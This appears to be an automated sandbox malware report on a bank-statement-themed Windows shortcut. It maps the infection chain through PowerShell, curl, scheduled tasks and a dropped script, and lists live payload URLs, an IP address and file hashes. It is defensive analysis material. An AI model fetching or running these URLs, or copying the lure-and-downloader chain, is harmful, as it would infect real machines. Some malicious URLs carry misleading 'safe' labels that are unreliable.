Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting		Valid Accounts1
Command and Scripting Interpreter		1
Scheduled Task/Job		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Scheduled Task/Job		11
Scripting		1
Scheduled Task/Job		21
Virtualization/Sandbox Evasion		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		1
DLL Side-Loading		1
DLL Side-Loading		11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417179 Sample: chasebank_statement_mar.lnk Startdate: 28/03/2024 Architecture: WINDOWS Score: 100 60 admiralpub.ca 2->60 66 Antivirus detection for URL or domain 2->66 68 Antivirus detection for dropped file 2->68 70 Windows shortcut file (LNK) starts blacklisted processes 2->70 72 9 other signatures 2->72 8 cmd.exe 1 2->8         started        11 cmd.exe 1 2->11         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        signatures3 process4 signatures5 76 Windows shortcut file (LNK) starts blacklisted processes 8->76 78 Suspicious powershell command line found 8->78 17 powershell.exe 14 20 8->17         started        20 conhost.exe 8->20         started        80 Uses schtasks.exe or at.exe to add and modify task schedules 11->80 22 curl.exe 2 11->22         started        25 conhost.exe 1 11->25         started        27 schtasks.exe 1 11->27         started        29 powershell.exe 13->29         started        31 conhost.exe 13->31         started        33 powershell.exe 15->33         started        35 conhost.exe 15->35         started        process6 dnsIp7 56 C:\Users\user\AppData\...GLG6DJOY9K9.js, ASCII 17->56 dropped 37 wscript.exe 1 17->37         started        40 conhost.exe 17->40         started        42 schtasks.exe 1 17->42         started        62 admiralpub.ca 103.26.141.28, 443, 49706, 49707 COGECO-PEER1CA Canada 22->62 64 127.0.0.1 unknown unknown 22->64 58 C:\Users\user\AppData\...\Pfx5CcXoK0qm.bat, ASCII 22->58 dropped 44 conhost.exe 29->44         started        46 schtasks.exe 1 29->46         started        48 wscript.exe 29->48         started        50 conhost.exe 33->50         started        52 schtasks.exe 1 33->52         started        54 wscript.exe 33->54         started        file8 process9 signatures10 74 Windows Scripting host queries suspicious COM object (likely to drop second stage) 37->74

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
chasebank_statement_mar.lnk100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js100%AviraJS/PShelldldr.MGBK

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://crl.m0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
https://admiralpub.ca/wp-content/uploads/2017/agent3.ps10%Avira URL Cloudsafe
http://admiralpub.ca0%Avira URL Cloudsafe
https://admiralpub.ca0%Avira URL Cloudsafe
https://admiralpub.ca/wp-content/0%Avira URL Cloudsafe
https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phplW0%Avira URL Cloudsafe
https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php0%Avira URL Cloudsafe
http://crl.microsoft80%Avira URL Cloudsafe
https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php0%Avira URL Cloudsafe
https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phpY0%Avira URL Cloudsafe
https://admiralpub.ca/wp-content/uploads/2017/agent1.ps10%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
admiralpub.ca
103.26.141.28
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.phptrue
    • Avira URL Cloud: safe
    		unknown
    https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phptrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2053029650.0000023F530ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2053029650.0000023F53223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2038635027.0000023F44A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD101AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://admiralpub.capowershell.exe, 00000007.00000002.2038635027.0000023F44644000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A015D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD015D0000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmptrue
        • URL Reputation: malware
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://go.micropowershell.exe, 00000007.00000002.2038635027.0000023F43C9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00C2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00C2C000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phplWcurl.exe, 00000002.00000002.1984030608.00000258B0F87000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/Licensepowershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://contoso.com/Iconpowershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://admiralpub.ca/wp-content/powershell.exe, 00000007.00000002.2038635027.0000023F4467C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD01608000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://crl.microsoft8powershell.exe, 00000015.00000002.2894258629.000002AD6D655000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phpYcurl.exe, 00000002.00000002.1984030608.00000258B0F87000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://admiralpub.ca/wp-content/uploads/2017/agent1.ps1wscript.exe, 00000018.00000002.2818480339.00000217B93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2818354957.00000217B91BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817698308.00000217B91AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817679859.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817938071.00000217B91BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B919C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, EGLG6DJOY9K9.js.7.drfalse
            • Avira URL Cloud: safe
            		unknown
            http://crl.mpowershell.exe, 0000000E.00000002.2260297974.0000027A686B6000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2053029650.0000023F530ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2053029650.0000023F53223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2038635027.0000023F44A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD101AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://oneget.orgXpowershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://admiralpub.capowershell.exe, 00000007.00000002.2038635027.0000023F43C9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00C2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD01339000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/pscore68powershell.exe, 00000007.00000002.2038635027.0000023F43071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00001000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2038635027.0000023F43071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00001000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://admiralpub.ca/wp-content/uploads/2017/agent3.ps1wscript.exe, 00000018.00000002.2818480339.00000217B93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2818354957.00000217B91BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817698308.00000217B91AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817679859.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817938071.00000217B91BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B919C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, EGLG6DJOY9K9.js.7.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://oneget.orgpowershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  103.26.141.28
                  		admiralpub.caCanada
                  		13768COGECO-PEER1CAtrue

                  Private

                  IP
                  127.0.0.1

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1417179
                  Start date and time:2024-03-28 18:10:57 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 55s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:25
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:chasebank_statement_mar.lnk
                  Detection:MAL
                  Classification:mal100.rans.winLNK@32/16@1/2
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 1
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .lnk

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 5668 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • VT rate limit hit for: chasebank_statement_mar.lnk

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  18:11:43Task SchedulerRun new task: qWQnYbiCKtrx1y2 path: "C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat" s>qWQnYbiCKtrx1y2
                  18:11:45API Interceptor32x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  COGECO-PEER1CAhttps://bafkreiakypngf5p2vusgmzt3htrul7f7hmhpylofrop6cg6waka2djtzz4.ipfs.dweb.link/#katja.lundberg-rand@daiichi-sankyo.euGet hashmaliciousUnknownBrowse
                  • 69.90.254.78
                  97zyqEu4Nh.elfGet hashmaliciousMoobotBrowse
                  • 66.135.35.54
                  https://arvest-securev2.com/Get hashmaliciousHTMLPhisherBrowse
                  • 207.198.113.205
                  https://ioa.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2FpasswordIP:Get hashmaliciousHTMLPhisherBrowse
                  • 69.90.254.78
                  https://trhj.pages.dev/IP:Get hashmaliciousHTMLPhisherBrowse
                  • 69.90.254.78
                  https://lanecain-homes.com/Get hashmaliciousUnknownBrowse
                  • 69.90.254.78
                  https://xfv.pages.dev/robots.txtGet hashmaliciousHTMLPhisherBrowse
                  • 69.90.254.78
                  https://jfb.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2FpasswordGet hashmaliciousHTMLPhisherBrowse
                  • 69.90.254.78
                  https://safemarkxxcs.xyz/Get hashmaliciousUnknownBrowse
                  • 69.90.254.78
                  AFWaD3vnqR.elfGet hashmaliciousMirai, GafgytBrowse
                  • 66.111.87.152

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  74954a0c86284d0d6e1c4efefe92b521SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exeGet hashmaliciousDiscord Token Stealer, XenoRAT, XmrigBrowse
                  • 103.26.141.28
                  SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exeGet hashmaliciousUnknownBrowse
                  • 103.26.141.28
                  w5ks798nGQ.exeGet hashmaliciousRedLineBrowse
                  • 103.26.141.28
                  chasebank_statement_mar.lnkGet hashmaliciousUnknownBrowse
                  • 103.26.141.28
                  SecuriteInfo.com.MacOS.ReverseShell-C.28203.22681.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                  • 103.26.141.28
                  SecuriteInfo.com.Heur.17968.23747.msiGet hashmaliciousUnknownBrowse
                  • 103.26.141.28
                  Microstub.exeGet hashmaliciousUnknownBrowse
                  • 103.26.141.28
                  Microstub.exeGet hashmaliciousUnknownBrowse
                  • 103.26.141.28
                  J-JeremieKarg-78462.jsGet hashmaliciousUnknownBrowse
                  • 103.26.141.28
                  J-JeremieKarg-78462.jsGet hashmaliciousUnknownBrowse
                  • 103.26.141.28
                  3b5074b1b5d032e5620f69f9f700ff0eReceipt of your email to Peak Plan ID rvwh0kc6Management .msgGet hashmaliciousUnknownBrowse
                  • 103.26.141.28
                  https://gcv.microsoft.us/kgRWagmalJGet hashmaliciousUnknownBrowse
                  • 103.26.141.28
                  BL-SHIPPING INVOICE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 103.26.141.28
                  https://drpetre.com/Get hashmaliciousUnknownBrowse
                  • 103.26.141.28
                  RFQ__363564546 -PO.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 103.26.141.28
                  T_240369_S#U0130PAR#U0130S.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 103.26.141.28
                  proforma invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 103.26.141.28
                  biden.ps1Get hashmaliciousUnknownBrowse
                  • 103.26.141.28
                  QJwM0vJ5mk.exeGet hashmaliciousLummaCBrowse
                  • 103.26.141.28
                  SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.16964.6395.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 103.26.141.28

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Preview:@...e...........................................................

                  C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1087
                  Entropy (8bit):5.650674719097719
                  Encrypted:false
                  SSDEEP:24:iJFacEC+Czzf5j1IsiRIbeQAxV6wlVICb1P/vMiKLVKLB:E7EP8Vj6xKhslXvMv8N
                  MD5:3D4FFF20EAC9C4B66CBBE96D71F4E958
                  SHA1:BA0D3DECD1616E63A71D910F68A9CC0D6F3E9649
                  SHA-256:34C5E1424B9B6E6C54A247B9794BFC465F34117B3A57AF74E13B8CEC0A9C8A84
                  SHA-512:0F2A022520D9C1FFDDFCA2A9F3E6F3B11DB0286474F2D124C3319D73E09D2EA5BC2479090F5820CDF3BF66A08BB102BB064F6DF5E50797CC2D2990235E26E069
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
